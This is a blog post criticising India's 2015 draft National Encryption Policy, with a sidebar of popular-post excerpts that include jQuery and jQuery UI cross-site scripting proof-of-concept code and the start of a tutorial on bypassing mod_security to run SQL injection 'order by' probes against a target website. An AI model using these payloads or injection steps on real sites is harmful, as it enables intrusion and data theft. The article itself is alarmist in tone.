Govt's new policy will make deleting messages before 90 days a crime

Every message that you send -- be it through WhatsApp, SMS, Email or any such service -- must be mandatorily stored in plain text format for 90 days and made available on demand to security agencies under a draft New Encryption Policy that has triggered privacy concerns.

If the new National Encryption Policy implements that come up with weird suggestions — one should not delete WhatsApp conversation, Gmail or any email for 90 days, it would be an Internet Disaster.

The draft National Encryption Policy posted by the Department of Electronics and Information Technology (DeitY) on its website points to some serious considerations that might become rules soon.

With the aim to ‘provide confidentiality of information’ and ensure ‘protection of sensitive or proprietary information’, the draft policy, proposed by an so-called ‘expert panel’ from the Department of Electronics and Information Technology (DeitY), requires:

Access to your Private Data

The government wants to have access to all your encrypted information including your personal emails, text and voice messages, and data stored in a private business server.

Not to Delete any WhatsApp Messages or Emails for 90 Days

The Policy will enforce Internet users to save all encrypted communication data in plaintext for at least 90 days, which includes: WhatsApp messages, emails, sensitive banking or e-commerce transactions details.

Share your Encryption Keys with Government

National Encryption Policy also want Indian Internet Users to give up their encryption keys to the Government and Security Agencies.

Foreign Services Providers need to Comply with Indian Government

In India, More than 80% of Internet users are addicted to Non-Indian services like WhatsApp, Facebook, Gmail, Skype, Telegram and thousands more.
But, the National Encryption Policy requires Service Providers located outside India to enter into an agreement with the Indian Government, which says:
“Encryption algorithms and key sizes will be prescribed by the Government,” the policy reads.
You can send your comments to akrishnan@deity.gov.in by October 16, 2015.

The draft National Encryption policy has triggered national outrage among citizens of India that are forced to store their online messages send through WhatsApp, SMS, e-mail or any such service for up to 90 days.

Every messaging service including Whatsapp, Facebook, Gmail use some form of encryption. Once approved this rule may be applicable to all instant messages and emails.

The proposal further reads, "All information shall be stored by the concerned B/C (business/citizen) entity for 90 days from the date of transaction and made available to Law Enforcement Agencies as and when demanded in line with the provisions of the laws of the country."

So right from your password of the netbanking to your Whatsapp messages, everything might be stored in the system for a maximum of 90 days.

And next time you say anything against anything, know that the Big Brother err government is watching you.

Comments

Post a Comment

Popular posts from this blog

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <
Read more

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   
Read more

Bypass Mod_Security

Image
This topic is similar as Manual Sql Injection. But mod_security are protect to hack website. You can see in this screenshot. Now In this tutorial we can learn how to bypass mod_security First we need one Target Website In My case I am using this website: http://www.target.com.pk Finding The Amount Of Columns Now that you found a vulnerable site, you need to find the amount of columns. You can do this by using the "Order By" function. Your link should now look like this: Code: http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error) Finding Vulnerable Columns So now that you got the amount of columns, you're going to want to see
Read more